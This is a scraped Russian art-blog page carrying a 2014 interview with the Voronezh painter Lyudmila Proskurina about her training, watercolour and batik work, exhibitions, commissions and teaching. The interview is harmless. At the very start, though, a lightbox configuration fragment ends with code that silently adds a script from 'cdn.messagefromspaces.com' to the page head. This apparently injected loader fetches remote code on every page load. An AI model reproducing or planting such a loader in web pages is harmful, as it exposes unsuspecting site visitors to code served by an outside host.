, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Интервью с художницей Проскуриной Людмилой

Автор: Дмитрий Алмазов | 15 Июн 2014

художница Проскурина ЛюдмилаВ Воронеже в ресторане «Медитерра» (ул. Красноармейская, 21а) мы взяли интервью у воронежской художницы Людмилы Проскуриной.

Воронеж - это не только экономический, аграрный, медицинский и образовательный центр, но и главная точка культурного развития Черноземья. Здесь всегда можно встретить творческую интеллигенцию, будь то художник, поэт или фотограф. Как разнообразен наш город в этом начинании, и каких значительных успехов он добился благодаря трудолюбивым творцам. Особой пометкой хочу выделить живописцев, которых у нас кстати не так уж и много, но мне посчастливилось встретиться с одной из них.

Проскурина Людмила Константиновна родилась в Воронеже, где тут же в 1995 году окончила Детскую художественную школу. А в 2003г. также с отличием отделение «Изобразительного искусства» факультета «Художественного образования» Воронежского Государственного Педагогического Университета, где теперь и преподает живопись на кафедре «Дизайна» Института Культуры и Искусства.

Гамлет (Шекспир), иллюстрация; бумага, графика, 40х30см

Про начало своего творческого пути Людмила говорит следующее:

Ничего особенного не было. Это была обычная учеба в школе, по обычному сценарию развивавшаяся. Типичный художественный рост и ничего примечательного я бы не выделила из того, чтобы было в качестве образования. Художественная школа, потом институт.

-Как отреагировала Ваша семья на новое увлечение?

В семье никто не был против моего нового начинания, скорее даже наоборот, инициатива исходила от родителей. Мама отвела меня в художественную школу и все делала для того, чтобы я научилась рисовать, помогала мне в этом, радовалась вместе со мной, водила меня в изостудию.

-Были ли люди, которые оказали подобное направляющее движение в вашей деятельности?

Безусловно это были мои учителя и педагоги. Все они оказали решающее воздействие в становлении и развитии меня как художника. Это были и первые учителя и весь преподавательский состав института. Они были моими наставниками, проводниками в искусство; наполнили меня своими знаниями, открыли новые двери.

Закат. Гагра, Абхазия.

Закат. Гагра, Абхазия. 2010г., бумага, акварель, 20х30см

-Сейчас вы рисуете в основном натюрморты, пейзажи. Во время Вашего профессионального становления были испробованы другие направления?

Во время учебы интересовалась сильно графикой, присутствовали в основном графические работы, гризайль. Акварель тоже можно считать графикой, потому что это не живопись, считается, что она относится к стилю графического искусства. Сейчас нет до сих пор одного мнения по поводу того, к чему относится акварель, к графике или живописи. Все равно в акварели присутствует и графика и живопись, можно сказать, что это смесь.

-Откуда Вы берете идеи? Расскажите о Вашем вдохновении?

Идеи рождаются во мне. Иногда они приходят в виде снов, хаотичных мыслей, представлений; они рождаются  подсознании и прокладывают себе путь в виде каких-то  визуальных образов. На самом деле это очень тяжелый, болезненный поиск. Нужно сделать множество эскизов, прежде чем получается какой-то конечный готовый вариант. Кардинально нового я ничего не придумываю, не пытаюсь изобрести велосипед.

Я не сторонник плагиата, или скачивать что-либо с интернета. Однако сейчас некоторые заказы осуществляют через интернет, но я не считаю это творчеством. Например, человеку понравилась картина, он заказывает ее, и я выполняю просьбу. Но я не считаю эти работы творческими.

Песни о Космосе, батик триптих, 64х27см

-Какие заказы Вы принимаете? Какие покупатели обычно бывают? Как люди узнают об этом? Как связываются с Вами?

Масло, акварель. Заказывают в основном русские. Но были заказы из Канады, Израиля, в общем заграницей. Заказывают в основном через интернет. Через страничку в соц. сетях – Вконтакте.

-Расскажите о самой любимой выставке, самой значимой.

Весной 2011 года была персональная выставка в художественной галерее «Нефта». Выставка называлась «С ЛЮБОВЬЮ…», была посвящена моей маме. Было очень много народу, приглашены гости, друзья,  мои студенты, музыкальный оркестр. Было выставлено много моих работ, это акварель и масло, и батик.

Центральная картина-триптих, батик «Сон под звездами». На ней изображены влюбленные, их тела заплелись друг с другом. Голова мужчины повернута вперед, а девушка лежит поперек него, кроме того, я к нему сочинила собственный стих «Влюбленные», посвященные именно этому триптиху.

Еще одна яркая работа, тоже батик, триптих «Яблоки. Начало.». Только тут яблоко не как символ первородного греха, а как символ мужчины и женщины. Техника горячего и холодного батика с золотым контуром.

Одна девушка даже написала стихотворение, посвященное моим работам и мне.

Багряный гиацинт на белом шелке

Под кистью плавится

И страхи не видны.

Дрожит хрусталь,

Разбитый на осколки.

В руках твоих его

Настигли сны.

Алена Шметько

Людмила Проскурина и Дмитрий Алмазов на выставке "Противостояние"

-Как получилась данная выставка? Расскажите о ней.

Были работы, акварель, цветы. Дмитрий Алмазов помог организовать выставку. После продажи картин остались именно они. С цветами проще, можно зарисовать с натуры и передать красоту цветов; не надо долго не размышлять над этим, а можно просто передать их совершенную красоту. Цветок он сам по себе красив, его необходимо только зарисовать, показать красоту, провести ее в этот мир. Ты оставляешь его жить навечно, цветок завянет, а на этой картине он будет жив намного дольше.

-Вы преподаете в ВГПУ. Стараетесь ли дать ученикам больше?

Просто так на этот вопрос не ответишь. Конечно же главная задача учителя  дать новые знания, умения, навыки, но на этом его функции не заканчиваются. Его миссия немного больше. Важное это общение-интеллектуальное,  личностное. Иногда можно разговаривать, учить ради общения, обычного простого общения. Главное не просто дать знания, умения, навыки, а

Разноцветные хризантемы, бумага, акварель, 30х40см

делиться с человеком. Я могу дать все это, так же как и эмоции, опыт. Кто захочет, тот возьмет и так. Вообще для меня нужен поиск чего-то нового. Это вечный поиск, духовный поиск. Кармический смысл жизни. Учитель, это тот, кто дает свет, добро. Он проводник.  Стараюсь быть именно таким педагогом.

Но из-за больших нагрузок, сессий, диссертации иногда устаешь. Тогда чувствуются скорые перемены в жизни, новые пока неизвестные направления. Необходимо меняться и я это понимаю, как говорится дважды  в одну реку не войдешь, поэтому я ищу, но дальнейший творческий путь пока для себя я еще не определила.

-Ожидать ли нашим зрителям что-то новое?

Думаю, пока что нет. Я еще не нашла новый путь, но я в процессе. Мы не можем знать, что будет дальше, что ожидает нас впереди, мы должны стремиться к тому, чтобы поиск завершился удачно. В нашей жизни все приходит и уходит, а творчество остается. Это моя религия, то, зачем стоит жить. Это не надоедает, наоборот дает сил. Это мое кармическое определение. Человек рождается и умирает, но он должен найти свой путь, найдя его, ты будешь счастлив. Трудности уходят - и жить легче. Творчество помогает жить. Оно очищает человека, заполняет его.

Надо идти дальше и ждать…

А Людмиле мы желаем не только здоровья, терпения, талантливых учеников, но и вдохновения.

Автор текста Алехина Дарья

Заказать картины у Людмилы Проскуриной Вы можете по телефону 8 (960)134-46-27 или написать письмо на странице контакты.

Темы: Арт Воронеж, Художник | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress